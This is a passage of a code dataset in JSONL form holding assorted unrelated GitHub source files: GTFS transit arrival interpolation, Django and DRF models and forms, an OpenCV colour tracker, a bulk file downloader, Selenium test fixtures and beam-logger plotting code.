[x2]\r\n\t\t\ty = [y1] + repeat_mid * [None] + [y2]\r\n\r\n\t\t\t# Build the dataframe and merge with the queried stop_times.\r\n\t\t\tfin_df = (\r\n\t\t\t\tsemi_final_df\r\n\t\t\t\t\t.assign(trip_id = trip_id,\r\n idx = idx,\r\n x = x,\r\n y = y,\r\n\t\t\t\t curr_time = curr_time,\r\n\t\t\t\t proj_speed = proj_speed,\r\n\t\t\t\t proj_trvel = lambda d: round(((d['dist'] / 1000) / proj_speed) * 3600), # Get projected travel time in seconds\r\n\t\t\t\t status = order_stat,\r\n\t\t\t\t dist_futr = dist_futr,\r\n\t\t\t\t futr_trvel = future_lst)\r\n\t\t\t\t\t.merge(sub_stp_time_df, on=['trip_id', 'stop_seque'])\r\n\t\t\t)\r\n\r\n\t\t\t## Prepare to calculate iteratively - estimated arrival time\r\n\t\t\tfrst_proj_trvel = fin_df['proj_trvel'].iloc[0] # Get the first projected travel time (sec.) - aka 1st veh.\r\n\t\t\tfrst_curr_time = fin_df['curr_time'].iloc[0] # Get the recorded time of the 1st veh. (consecutive pair)\r\n\t\t\tbtwn_df = fin_df.iloc[1:-1] # Get only in-between to assess estimate time - exclude 1st and last observation\r\n\t\t\test_time_list = self._estTime(curr_time=frst_curr_time,\r\n\t\t\t proj_trvel=frst_proj_trvel,\r\n\t\t\t btwn_df=btwn_df)\r\n\r\n\t\t\t# Build the final dataframe\r\n\t\t\tfinal_df = (\r\n\t\t\t\tfin_df\r\n\t\t\t\t\t.assign(est_arr = est_time_list, # Estimated arrival time\r\n\t\t\t\t draft_date = lambda d: d['est_arr'].str.split(\" \").str[0],\r\n\t\t\t\t sched_arr = lambda d: d['draft_date'].iloc[0] + \" \" + d['arrival_time'],\r\n\t\t\t\t tmp_arr = lambda d: d['draft_date'] + \" \" + d['arrival_time'], # Combine day with hour and second (e.g., 2021-09-30 13:40:30)\r\n\t\t\t\t # The arrival time difference - comparison between estimated arrival time and expected arrival time\r\n\t\t\t\t arr_tmedif = lambda d: d[['est_arr', 'tmp_arr']].apply(lambda r: TimeDelta(*r).change_time, axis=1),\r\n\t\t\t\t off_earr = est_time_list[0:-1] + [future_arr]) # Official estimated arrival_time including the 2nd veh. loc\r\n\t\t\t)\r\n\r\n\t\t\t## Prepare to calculate the time difference from estimated arrival time and scheduled arrival time for the 2nd veh. 
loc.\r\n\t\t\tlast_off_est_arr = final_df['off_earr'].iloc[-1]\r\n\t\t\tlast_sched_arr = final_df['sched_arr'].iloc[-1]\r\n\t\t\tarr_tme_dif = list(final_df['arr_tmedif'])[0:-1] # From first to second last observation during consecutive pair.\r\n\t\t\tlast_off_tme_dif = [TimeDelta(last_off_est_arr, last_sched_arr).change_time if (last_sched_arr and last_sched_arr) is not None else None][0]\r\n\t\t\toff_tme_dif = arr_tme_dif + [last_off_tme_dif]\r\n\r\n\t\t\t## Finalize the interpolated dataframe and return\r\n\t\t\tfinal_df = (\r\n\t\t\t\tfinal_df\r\n\t\t\t\t\t.assign(off_arrdif = off_tme_dif, # Assign official time difference in all observations - determine what is late, on-time, early\r\n\t\t\t\t\t\t\toff_arrdif_shift = lambda d: d['off_arrdif'].shift(-1),\r\n\t tmp_change = lambda d: d[['off_arrdif', 'off_arrdif_shift']].apply(lambda e: self._perfChange(*e), axis=1),\r\n\t perc_chge = lambda d: d['tmp_change'].shift(1),\r\n\t perf_rate = lambda d: d['off_arrdif'].apply(lambda e: self._classifyOnTime(e)))\r\n\t\t\t\t\t.rename(columns = {'departure_time' : 'dept_time'})\r\n\t\t\t\t[keep_col]\r\n\t\t\t)\r\n\r\n\t\t\treturn final_df\r\n\r\n\r\n\t\telif (travel_type == \"Stationary\"):\r\n\r\n\t\t\tfinal_df = (\r\n\t\t\t\tsemi_final_df\r\n\t\t\t\t\t.assign(trip_id = trip_id,\r\n idx = idx,\r\n x = x1,\r\n y = y1,\r\n\t\t\t\t curr_time = local_time,\r\n\t\t\t\t proj_speed = proj_speed,\r\n\t\t\t\t proj_trvel = None,\r\n\t\t\t\t status = 'Stationary',\r\n\t\t\t\t dist_futr = None,\r\n\t\t\t\t futr_trvel = None)\r\n\t\t\t\t\t.merge(sub_stp_time_df, on=['trip_id', 'stop_seque'])\r\n\t\t\t\t\t.rename(columns = {'departure_time' : 'dept_time'})\r\n\t\t\t\t\t.assign(est_arr = None,\r\n\t\t\t\t draft_date = lambda d: d['curr_time'].str.split(\" \").str[0],\r\n\t\t\t\t tmp_arr = lambda d: d['draft_date'] + \" \" + d['arrival_time'],\r\n\t\t\t\t off_earr = None,\r\n\t\t\t\t sched_arr = None,\r\n\t\t\t\t arr_tmedif = None,\r\n\t\t\t\t off_arrdif = None,\r\n\t\t\t\t perc_chge = None,\r\n\t\t\t\t perf_rate = None)\r\n\t\t\t\t[keep_col]\r\n\t\t\t)\r\n\r\n\t\t\treturn final_df\r\n\r\n\r\n\t\telif (travel_type == \"Same Stop - Same Segment\") or (travel_type == \"Same Stop - Different Segment\") or (travel_type == \"Terminus - Same Segment\") or (travel_type == \"Terminus - Different Segment\"):\r\n\r\n\t\t\tif travel_type == \"Same Stop - Same Segment\" or travel_type == \"Terminus - Same Segment\":\r\n\t\t\t\tseg_stat = \"Same Segment\"\r\n\r\n\t\t\telse:\r\n\t\t\t\tseg_stat = \"Different Segment\"\r\n\r\n\r\n\t\t\t# Flatten out nested distance\r\n\t\t\tfirst_dist = future_dist[0]\r\n\t\t\tfuture_dist = future_dist[1]\r\n\r\n\t\t\tif future_dist is None:\r\n\t\t\t\tfuture_dist = 0\r\n\r\n\t\t\torder_stat = [f\"{status}-{seg_stat}\", f\"{stat_shift}-{seg_stat}\"]\r\n\t\t\tcurr_time = [local_time, time_shift]\r\n\t\t\tdist_futr = [first_dist, future_dist]\r\n\t\t\tidx = [idx, idx]\r\n\t\t\tx = [x1, x2]\r\n\t\t\ty = [y1, y2]\r\n\r\n\t\t\ttry:\r\n\t\t\t\t# Calculate future travel for both veh. 
points.\r\n\t\t\t\tfuture_trvel_1 = round(((first_dist/1000)/proj_speed)*3600)\r\n\t\t\t\tfuture_trvel_2 = round(((future_dist/1000) / proj_speed) * 3600)\r\n\r\n\t\t\t\tfuture_lst = [future_trvel_1, future_trvel_2]\r\n\t\t\t\tproj_trvel = [round(((f/1000)/proj_speed)*3600) for f in future_lst]\r\n\r\n\t\t\t\t# Use futr_trvel to estimate proj_trvel instead!!\r\n\t\t\t\tfinal_df = (\r\n\t\t\t\t\tsemi_final_df\r\n\t\t\t\t\t\t.assign(trip_id = trip_id,\r\n idx = idx,\r\n x = x,\r\n y = y,\r\n\t\t\t\t\t curr_time = curr_time,\r\n\t\t\t\t\t proj_speed = proj_speed,\r\n\t\t\t\t\t futr_trvel = future_lst,\r\n\t\t\t\t\t proj_trvel = proj_trvel,\r\n\t\t\t\t\t status = order_stat,\r\n\t\t\t\t\t dist_futr = dist_futr,\r\n\t\t\t\t\t est_arr = lambda d: d[['curr_time', 'proj_trvel']].apply(lambda e: self._addTime(*e), axis=1),\r\n\t\t\t\t\t draft_date = lambda d: d['curr_time'].str.split(\" \").str[0])\r\n\t\t\t\t\t\t.merge(sub_stp_time_df, on=['trip_id', 'stop_seque'])\r\n\t\t\t\t\t\t.rename(columns={'departure_time': 'dept_time'})\r\n\t\t\t\t\t\t.assign(sched_arr = lambda d: d['draft_date'].iloc[0] + \" \" + d['arrival_time'],\r\n\t\t\t\t\t tmp_arr = lambda d: d['draft_date'] + \" \" + d['arrival_time'],\r\n\t\t\t\t\t arr_tmedif = lambda d: d[['est_arr', 'tmp_arr']].apply(lambda r: TimeDelta(*r).change_time, axis=1),\r\n\t\t\t\t\t off_earr = lambda d: d['est_arr'],\r\n\t\t\t\t\t off_arrdif = lambda d: d['arr_tmedif'],\r\n off_arrdif_shift = lambda d: d['off_arrdif'].shift(-1),\r\n tmp_change = lambda d: d[['off_arrdif', 'off_arrdif_shift']].apply(lambda e: self._perfChange(*e), axis=1),\r\n perc_chge = lambda d: d['tmp_change'].shift(1),\r\n perf_rate = lambda d: d['off_arrdif'].apply(lambda e: self._classifyOnTime(e))\r\n\t\t\t\t\t )\r\n\t\t\t\t\t[keep_col]\r\n\t\t\t\t)\r\n\r\n\t\t\t\treturn final_df\r\n\r\n\t\t\t# RESOLVE THIS\r\n\t\t\texcept Exception as e:\r\n\r\n\t\t\t\t# For any failure to calculate.\r\n\t\t\t\tfin_df = (\r\n\t\t\t\t\tsemi_final_df\r\n\t\t\t\t\t\t.assign(trip_id=trip_id,\r\n idx=idx,\r\n x = x,\r\n y = y,\r\n\t\t\t\t\t curr_time=curr_time,\r\n\t\t\t\t\t proj_speed=proj_speed,\r\n\t\t\t\t\t futr_trvel=None,\r\n\t\t\t\t\t proj_trvel=None,\r\n\t\t\t\t\t status=order_stat,\r\n\t\t\t\t\t dist_futr=dist_futr,\r\n\t\t\t\t\t est_arr=None,\r\n\t\t\t\t\t sched_arr=None,\r\n tmp_arr=None,\r\n arr_tmedif=None,\r\n off_earr=None,\r\n off_arrdif=None,\r\n perc_chge=None,\r\n perf_rate=None)\r\n\t\t\t\t\t\t.merge(sub_stp_time_df, on=['trip_id', 'stop_seque'])\r\n\t\t\t\t\t\t.rename(columns={'departure_time': 'dept_time'})\r\n\t\t\t\t\t[keep_col]\r\n\t\t\t\t)\r\n\r\n\t\t\t\treturn fin_df","repo_name":"highered-esricanada/Parallel-GTFS-Workflow","sub_path":"package/code/gtfs_process/util/universal_cal.py","file_name":"universal_cal.py","file_ext":"py","file_size_in_byte":23573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"7839213452","text":"import functions as func\n\ndef normalize_hashtags(hashtag):\n hashtag = hashtag.casefold()\n hashtag = hashtag.replace(\"__\", \"_\")\n hashtag = hashtag.replace(\"ー\",\"\")\n hashtag = hashtag.replace(\"-\",\"\")\n return hashtag\n\nclass Hashtags:\n def __init__(self, file):\n data = func.read_json_file(file)\n self.keys = []\n self.values = {}\n for indx, row in enumerate(data):\n self.keys.append(row['key'])\n for hashtag in row['similares']:\n self.values[normalize_hashtags(hashtag)] = indx\n \n def get_key_hashtag(self,hashtag):\n key_hashtag = None\n hashtag = 
normalize_hashtags(hashtag)\n        if(hashtag in self.values):\n            index = self.values[hashtag]\n            key_hashtag = self.keys[index]\n        return key_hashtag\n    \n    def get_all_key_hashtags(self):\n        return self.keys\n\n    ","repo_name":"albertorobles2000/TFG-AlbertoRoblesHernandez","sub_path":"hashtags.py","file_name":"hashtags.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14338923259","text":"from collections import Counter\n\n# dict sub class -- count hashable objects\n\n# counter with lists\n\nlist = [1,2,2,3,3,4,3,4,5,5,5,4,5,5,4]\nprint(Counter(list))\n\n# Counter with strings\n\nstrCount = 'aabbbccccddddde'\nprint(Counter(strCount))\n\n# Counter with sentence\n\nsentence = 'How many times does each word show up in this sentence, word times each word each time'\nwords = sentence.split()\nprint('word counter:', Counter(words))\n\nc = Counter(words)\nprint(c.most_common(3))","repo_name":"sasidhar20/python","sub_path":"com/test/python/Oops/Collections/Counter.py","file_name":"Counter.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41208698329","text":"import numpy as np\nimport cv2\n\ndef showVideo() :\n    try :\n        print(\"Turn on Camera\")\n        cap = cv2.VideoCapture(1)\n    except :\n        print(\"FAIL\")\n        return\n\n    while True :\n        ret, frame = cap.read()\n\n        if not ret :\n            print(\"ERROR\")\n            break\n\n        ###########################################################\n        hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n        lower_blue = np.array([110,100,100])\n        upper_blue = np.array([130,255,255])\n        \"\"\"\n        lower_green = np.array([50,100,100])\n        upper_green = np.array([70,255,255])\n\n        lower_red = np.array([-10,100,100])\n        upper_red = np.array([10,255,255])\n        \"\"\"\n\n        mask_blue = cv2.inRange(hsv, lower_blue, upper_blue)\n        #mask_green = cv2.inRange(hsv,lower_green, upper_green)\n        #mask_red = cv2.inRange(hsv, lower_red, upper_red)\n\n        result1 = cv2.bitwise_and(frame, frame, mask = mask_blue)\n        #result2 = cv2.bitwise_and(frame, frame, mask = mask_green)\n        #result3 = cv2.bitwise_and(frame, frame, mask = mask_red)\n\n        if not result1.any() :\n            print(\"Can not find blue\")\n\n\n        cv2.imshow('BLUE', result1)\n        #cv2.imshow('GREEN',result2)\n        #cv2.imshow('RED',result3)\n\n        ###########################################################\n\n\n        cv2.imshow('frame',frame)\n        k = cv2.waitKey(1) & 0xFF\n        if k == 27 :\n            break\n        # esc : 27(ASCII)\n\n    cap.release()\n    #opened object close (release)\n    cv2.destroyAllWindows()\n\nshowVideo()\n","repo_name":"ykiseong303/openCVexam","sub_path":"exam07_color_tracking.py","file_name":"exam07_color_tracking.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14688636618","text":"# def binary_search(numbers, target):\n#     numbers.sort()\n#     start = 0\n#     end = len(numbers) - 1\n\n#     while start <= end:\n#         mid = (start + end) // 2\n\n#         if numbers[mid] == target:\n#             return target\n\n#         if target < numbers[mid]:\n#             end = mid - 1\n#         else:\n#             start = mid + 1\n\n#     return False\n\n\ndef find_duplicate(nums):\n    if type(nums) != list or len(nums) <= 1:\n        return False\n    nums.sort()\n    for i, n in enumerate(nums[:-1]):\n        if type(n) == str or n < 0:\n            return False\n        if n == nums[i + 1]:\n            return n\n\n    return 
False\n","repo_name":"viegasjean/algorithms","sub_path":"challenges/challenge_find_the_duplicate.py","file_name":"challenge_find_the_duplicate.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38153928859","text":"import urllib.request\r\nimport os\r\nimport requests\r\n\r\ndef download_file(url, destination_path):\r\n # URL'den dosya aç ve oku\r\n with urllib.request.urlopen(url) as url:\r\n # Hedef dizine dosyayı yaz\r\n with open(destination_path, 'wb') as f:\r\n f.write(url.read())\r\n\r\ndef download_from_wordlist(wordlist_path):\r\n # İndirilen dosyaların sayısını saklamak için sayaç\r\n counter = 0\r\n # Kelime listesini aç\r\n with open(wordlist_path, 'r') as f:\r\n # Her satırı oku\r\n for line in f:\r\n # Satır başı/sonu boşluklarını sil\r\n url = line.strip()\r\n # Dosya adını URL'den al\r\n filename = os.path.basename(url)\r\n # Dosyayı indir\r\n download_file(url, filename)\r\n print(f\"{url} adresinden dosya indirildi\")\r\n counter += 1\r\n # Sayacın 10'a ulaşıp ulaşmadığını kontrol et\r\n if counter % 10 == 0:\r\n # IP değiştir\r\n change_ip()\r\n\r\n#def change_ip():\r\n # VPN veya proxy hizmetinden yeni bir IP iste\r\n #requests.get(\"http://your-vpn-or-proxy-service.com/change_ip\")\r\n #print(\"IP adresi değiştirildi\")\r\n\r\n# Fonksiyonu örnek bir kelime listesiyle test et\r\nwordlist_path = \"links.txt\"\r\ndownload_from_wordlist(wordlist_path)","repo_name":"guneyimben/docs_dumper","sub_path":"docs_dumper.py","file_name":"docs_dumper.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72562822953","text":"from rest_framework import serializers\nfrom books.models import Book, Reader\n\n\nclass BookSerializer(serializers.Serializer):\n id = serializers.IntegerField(required=False)\n title = serializers.CharField(max_length=100, required=True)\n author = serializers.CharField(max_length=100, required=True)\n description = serializers.CharField(required=False)\n reader = serializers.CharField(required=False)\n\n def create(self, validated_data):\n return Book.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.title = validated_data.get('title', instance.title)\n instance.author = validated_data.get('author', instance.author)\n instance.description = validated_data.get(\n 'description', instance.description,\n )\n new_reader = validated_data.get('reader', 'none')\n if new_reader == 'none':\n instance.reader = None\n elif new_reader:\n new_reader_id = int(new_reader)\n new_reader = Reader.objects.get(id=new_reader_id)\n instance.reader = new_reader\n instance.save()\n return instance\n\n\nclass ReaderSerializer(serializers.Serializer):\n id = serializers.IntegerField(required=False)\n first_name = serializers.CharField(max_length=100)\n last_name = serializers.CharField(max_length=100)\n list_of_books = serializers.ListField(required=False)\n\n def create(self, validated_data):\n return Reader.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.first_name = validated_data.get(\n 'first_name', instance.first_name,\n )\n instance.last_name = validated_data.get(\n 'last_name', instance.last_name,\n )\n instance.save()\n return 
instance\n","repo_name":"Ferril/library-project","sub_path":"library/books/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37211874894","text":"from django import forms\nfrom .models import Catastro\nfrom apps.gdocumental.models import GDocumental\n\nclass CatastroForm(forms.ModelForm):\n #pk_empresa = forms\n #pk_gestion_documental=forms\n descripcion_catastral = forms.CharField(max_length=50)\n referencia_catastral = forms.CharField(max_length=50) \n class Meta:\n model=Catastro\n exclude = ['usuario_modifica','fecha_modificacion','usuario_crea','fecha_creacion', 'pk_gestion_documental']\n widget={'descripcion castastral': forms.TextInput()}\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in iter(self.fields):\n self.fields[field].widget.attrs.update({\n 'class': 'form-control'\n })\n\nclass CatastroPDFForm(forms.ModelForm):\n #pk_empresa = forms\n #pk_gestion_documental=forms\n #descripcion_catastral = forms.CharField(max_length=50)\n #referencia_catastral = forms.CharField(max_length=50) \n class Meta:\n model=Catastro \n exclude = ['usuario_modifica','fecha_modificacion','usuario_crea','fecha_creacion']\n widget={'descripcion castastral': forms.TextInput()}\n fields = ['pk_gestion_documental']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in iter(self.fields):\n self.fields[field].widget.attrs.update({\n 'class': 'form-control'\n })\n\nclass GDFormPDF(forms.ModelForm):\n #pk_empresa = forms\n #pk_gestion_documental=forms\n \n #form.pk_gestion_documental.queryset=pk_gestion_documental.objects.filter(pk_gestion_documental=1) \n #self.fields['category'].queryset = models.GDocumental.objects.filter(user=user)\n #form.rate.queryset = Rate.objects.filter(company_id=the_company.id)\n #pk_gestion_documental = forms.pk_gestion_documental(queryset=pk_gestion_documental.objects.all())\n\n gd = forms.ModelChoiceField(\n queryset = Catastro.objects.filter(pk_gestion_documental=1)\n )\n\n descripcion = forms.CharField(max_length=50)\n #referencia_catastral = forms.CharField(max_length=50) \n class Meta:\n model=GDocumental\n exclude = ['um','fm','uc','fc']\n widget={'ficheros': forms.TextInput()}\n fields = ['gd', 'descripcion', 'fichero_pdf']\n #fields = ['descripcion']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in iter(self.fields):\n self.fields[field].widget.attrs.update({\n 'class': 'form-control'\n })\n","repo_name":"JavierGonzalezAlvarez/django_admin_angular","sub_path":"back/apps/catastro/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21293124620","text":"import os\n\nAPI_TOKEN = os.environ.get(\"TG_API_TOKEN\")\nNOTIFY_TIME = 0\nVERSION_BUILD = \"3.2.1_13062023\"\n\nrelax_timer = 5\nrelax_mailer = 0.2\nrelax_retry_error = 10\nrelax_checker = 0.2\n\nadmin_ids = list(os.environ.get(\"ADMIN_CHAT_IDS\").split(\",\"))\ndb_url = os.environ.get(\"DATABASE_URL\")\n\ndb_table_users = \"users\"\ndb_table_login = \"login\"\ndb_table_regions = \"regions\"\ndb_table_examsinfo = \"exams_info\"\ndb_table_stats = \"stats\"\n\nEGE_URL = \"https://checkege.rustest.ru/api/exam\"\nEGE_TOKEN_URL = \"https://checkege.rustest.ru/api/captcha\"\nEGE_LOGIN_URL = 
\"https://checkege.rustest.ru/api/participant/login\"\n\nEGE_HEADERS = {\n 'Accept': '*/*',\n 'Accept-Language': 'ru,ru-RU;q=0.9,en;q=0.8,sr;q=0.7',\n 'Connection': 'keep-alive',\n 'Cookie': '',\n 'DNT': '1',\n 'Referer': 'https://checkege.rustest.ru/exams',\n 'Sec-Fetch-Dest': 'empty',\n 'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Site': 'same-origin',\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; Redmi 5 Build/OPM1.171019.026; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/111.0.5563.116 YaBrowser/22.8.0.223 (lite) Mobile Safari/537.36',\n 'X-Requested-With': 'XMLHttpRequest'\n}\n\nproxy_url = os.environ.get(\"PROXY_URL\")\nenvironment_id = os.environ.get(\"ENVIRONMENT_UID\")\n","repo_name":"amanokh/EgeCheckBot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"38750280514","text":"#! /usr/bin/env python3\n\"\"\"Python style grep\"\"\"\n\nimport sys\nimport re\nimport fileinput\n\n\ndef grep_py(args):\n \"\"\"Searches for pattern in files given on commandline\n and prints matches to standard out.\n\n Args:\n args: commandline arguments.\n \"\"\"\n\n try:\n search_string = args[1]\n with fileinput.input(args[2:]) as infile:\n matches = [(infile.filename(), infile.filelineno(), line)\n for line in infile\n if re.search(search_string, line, re.IGNORECASE)]\n\n if len(args[2:]) > 1:\n for file_name, line_number, line in matches:\n print('{file_name}: ({number}): {match}'.format(\n file_name=file_name,\n number=line_number,\n match=line),\n end='')\n else:\n print(*matches, sep='')\n except FileNotFoundError:\n print('{program_name}: {file_name}: No such file or directory'.format(\n program_name=args[0],\n file_name=args[2]\n ))\n sys.exit(-2)\n except KeyboardInterrupt:\n sys.exit(-3)\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 2:\n sys.exit(grep_py(sys.argv))\n else:\n sys.exit(-1)\n","repo_name":"subs-comps-git/toolbox","sub_path":"system/grep.py","file_name":"grep.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41533236064","text":"import requests\nimport json\nimport datetime\nimport time\n\nurl = 'http://localhost:4101/api/v1/analytics/logs' # Replace with the actual URL of the form submission endpoint\nwhile True:\n form_data = {\n 'timestamp': datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S'), \n 'CameraName': 'johndoe@example.com',\n 'location': 'This is a test message',\n 'CustomerName':'abc',\n 'Lat': 22.01,\n 'Long': 22.01,\n 'Speed' : 40,\n \"VehicleType\": \"\",\n \"Vehicle_Color\": \"\",\n \"isSpeeding\": \"false\",\n \"isANPR\": \"false\",\n \"isWrongWay\":\"false\" ,\n \"isNoHelmet\": \"false\",\n \"isRLVD\": \"false\",\n \"isTripleRiding\": \"false\",\n \"VehicleMake\": \"\",\n \"vehicle_lpr_number\": \"\" ,\n \"vehicle_model\": \"\",\n \"LPNumber\": \"\",\n \n\n }\n files = {} \n files = {\n # 'IMAGEURL': open('./test.webp', 'rb'),\n 'SnapshotURL': open('./test.webp', 'rb'),\n # 'LPImageURL': open('/path/to/file.pdf', 'rb'),\n # 'RLVDImageURL': open('/path/to/file.pdf', 'rb'),\n # 'VideoURL': open('/path/to/file.pdf', 'rb'),\n }\n\n\n response = requests.post(url, data=json.loads(json.dumps(form_data)), files=files)\n \n print(response.status_code)\n # Check the response status code\n if response.status_code == requests.codes.created:\n print('Form submitted successfully!')\n else:\n 
print('Failed to submit the form.')\n time.sleep(0.30)","repo_name":"deepikaverma2906/deepika","sub_path":"Client-api/sendlogs.py","file_name":"sendlogs.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1777120817","text":"import threading\n\n\nclass MetaBorg(type):\n _state = {\"__skip_init__\": False}\n _borg_lock = threading.Lock()\n\n def __call__(cls, *args, **kwargs):\n if cls._state['__skip_init__']:\n cls.__check_args(*args, **kwargs)\n with cls._borg_lock:\n instance = object().__new__(cls, *args, **kwargs)\n instance.__dict__ = cls._state\n if not cls._state['__skip_init__']:\n instance.__init__(*args, **kwargs)\n cls._state['__skip_init__'] = True\n return instance\n\n def __check_args(cls, *args, **kwargs):\n nargs = len(args)\n if nargs > 0:\n raise TypeError(\n '{}() takes 0 positional arguments after first initialization but {} was given'.format(\n cls.__name__, nargs\n )\n )\n nkeys = len(kwargs)\n if nkeys > 0:\n raise TypeError(\n \"{}() got an unexpected keyword argument '{}' after first initialization\".format(\n cls.__name__, list(kwargs.keys())[0]\n )\n )\n","repo_name":"uniba-ktr/KaaS","sub_path":"kathara-rest/src/control/borg.py","file_name":"borg.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"29782334307","text":"from django.conf.urls import url\r\n\r\nfrom tools.views import screen_width, tiny_mce, canvas01, dragNdrop\r\n\r\nurlpatterns = [\r\n url(r'^$', screen_width),\r\n url(r'^tinymce/$', tiny_mce),\r\n url(r'^canvas01/$', canvas01),\r\n url(r'^dndrop/$', dragNdrop),\r\n]\r\n","repo_name":"nybble33/code_sample","sub_path":"tools/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21090642849","text":"import allure\nimport pytest\nimport time\n\nfrom allure_commons.types import AttachmentType\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service as ChromeService\nfrom selenium.webdriver.common.alert import Alert\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\n\nfrom Utilities import configReader\n\n\n@pytest.hookimpl(hookwrapper=True, tryfirst=True)\ndef pytest_runtest_makereport(item, call):\n outcome = yield\n rep = outcome.get_result()\n setattr(item, \"rep_\" + rep.when, rep)\n return rep\n\n\n@pytest.fixture(scope=\"function\")\ndef chrome_browser():\n global driver\n driver = webdriver.Chrome(service=ChromeService(ChromeDriverManager().install()))\n driver.get(\"https://www.facebook.com/\")\n driver.maximize_window()\n yield driver\n driver.quit()\n\n\n@pytest.fixture(params=[\"chrome\", \"firefox\"], scope=\"function\")\ndef get_browser(request):\n # global driver\n remote_url = \"http://localhost:4444/wd/hub\"\n if request.param == \"chrome\":\n # driver = webdriver.Chrome(service=ChromeService(ChromeDriverManager().install()))\n driver = webdriver.Remote(command_executor=remote_url, desired_capabilities={\"browserName\": \"chrome\"})\n if request.param == \"firefox\":\n # driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n driver = webdriver.Remote(command_executor=remote_url, desired_capabilities={\"browserName\": \"firefox\"})\n\n 
driver.get(\"https://www.facebook.com/\")\n driver.maximize_window()\n yield driver\n driver.quit()\n\n@pytest.fixture()\ndef log_on_failure(request, get_browser1):\n yield\n item = request.node\n if item.rep_call.failed:\n allure.attach(driver.get_screenshot_as_png(), name=\"dologin\", attachment_type=AttachmentType.PNG)\n\n\n@pytest.fixture(params=[\"chrome\", \"firefox\"], scope=\"function\")\ndef get_browser1(request):\n # global driver\n remote_url = \"http://localhost:4444/wd/hub\"\n if request.param == \"chrome\":\n # driver = webdriver.Chrome(service=ChromeService(ChromeDriverManager().install()))\n driver = webdriver.Remote(command_executor=remote_url, desired_capabilities={\"browserName\": \"chrome\"})\n if request.param == \"firefox\":\n # driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n driver = webdriver.Remote(command_executor=remote_url, desired_capabilities={\"browserName\": \"firefox\"})\n request.cls.driver = driver\n driver.get(configReader.readConfig(\"basic info\", \"testsiteurl\"))\n driver.maximize_window()\n driver.implicitly_wait(10)\n yield driver\n driver.quit()\n","repo_name":"goudasantosh005/SeleniumPythonPageObjectModel","sub_path":"Testcases/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74346062311","text":"from logger_get import *\nimport numpy as np\n\n\nnhours=72\nT2 = int(time.time())\nT1 = int(T2 - nhours*3600)\n\nbnb_rate = {\n \"desc\": \"BNB rate\",\n \"devicename\": \"E:MBRATE\",\n \"units\": \"protons/hour\",\n \"event\": \"e,00,e,2000\",\n \"color\": black,\n \"yMin\": 0.0,\n \"yMax\": 1.0E17\n}\nbnb_tor = {\n \"desc\": \"BNB intensity\",\n \"devicename\": \"E:TR875L\",\n \"units\": \"protons/pulse\",\n \"event\": \"e,1d,e,40\",\n \"color\": gold,\n \"yMin\": 0.0,\n \"yMax\": 5\n}\ntry:\n\tt, d = acsysLoggerGet(bnb_rate[\"devicename\"], bnb_rate[\"event\"], T1, T2)\n\tbnb_rate[\"t_data\"] = t\n\tbnb_rate[\"data\"] = d\n\tt, d = acsysLoggerGet(bnb_tor[\"devicename\"], bnb_tor[\"event\"], T1, T2)\n\tbnb_tor[\"t_data\"] = t\n\tbnb_tor[\"data\"] = d\n\ttimePlot('bnb_overview', [bnb_rate, bnb_tor], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\t\nbooster_turns = {\n \"desc\": \"Booster $1D turns\",\n \"devicename\": \"G:TURN1D\",\n \"units\": \"turns\",\n \"event\": \"p,30000\",\n \"color\": grey,\n \"yMin\": 0.0,\n \"yMax\": 20.0,\n}\nbnb_rep = {\n 